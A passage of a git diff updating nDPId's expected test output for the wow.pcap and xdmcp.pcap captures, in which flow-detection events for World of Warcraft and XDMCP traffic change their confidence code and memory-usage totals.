00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437858769451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769451,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437858769452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769452,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437858769649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769649,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG6kgMgd41wKiyFABQmY301K7baPoTfqASFqCzawAAAgQFhAQCCAqn1+VGACnZUgEDAwc="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437858769673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1437858769673,"pkt":"JGURQGHhJGUR0Ik6CABFAAAwGJRAAHEGSPkYaR0VwKiyFABQmZCXtfydBIffHXASIACqLAAAAgQFhAQCAAA="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858780584,"flow_last_seen":1437858780584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858780584,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437858780584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1437858780584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1437858780796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780796,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmaEZw7OGrM1zDqASOJCV8gAAAgQFhAQCCApCuV\/iACndrQEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858849489,"flow_last_seen":1437858849489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858849489,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437858849489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437858849489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437858849702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849702,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmcRkqiOyEV+yfKASOJAOpgAAAgQFhAQCCApCum0NACn4mAEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","packets-captured":83,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":4309,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1437859397750} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437859397750,"flow_last_seen":1437859397750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437859397750,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437859397750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1437859397750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1437859397966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397966,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+UMgeSYwKiyFA6Mmqlj7+ucr3YvkqASOJA2KQAAAgQFhAQCCApCwowWACrOwgEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-payload-len":4586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1437859398661} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 @@ -40,9 +40,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882827 bytes -~~ total memory freed........: 5882827 bytes -~~ total allocations/frees...: 118237/118237 +~~ total memory allocated....: 6016461 bytes +~~ total memory freed........: 6016461 bytes +~~ total allocations/frees...: 120999/120999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 797 chars diff --git a/test/results/xdmcp.pcap.out b/test/results/xdmcp.pcap.out index 866c413b0..a8020518f 100644 --- a/test/results/xdmcp.pcap.out +++ b/test/results/xdmcp.pcap.out @@ -2,10 +2,10 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1538467333581} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1538467333581,"flow_last_seen":1538467333581,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1538467333581,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1538467333581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":15,"thread_ts_msec":1538467333581,"pkt":"CAAngNsFUlQAEjUACABFAAAjIEIAAP8Rg4AKAQICCgECBO\/yALEAD\/cgAAEAAgABAAAAAAAAAAAAAAAA"} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1538467333581,"flow_last_seen":1538467333581,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1538467333581,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1538467333581,"flow_last_seen":1538467333581,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1538467333581,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} 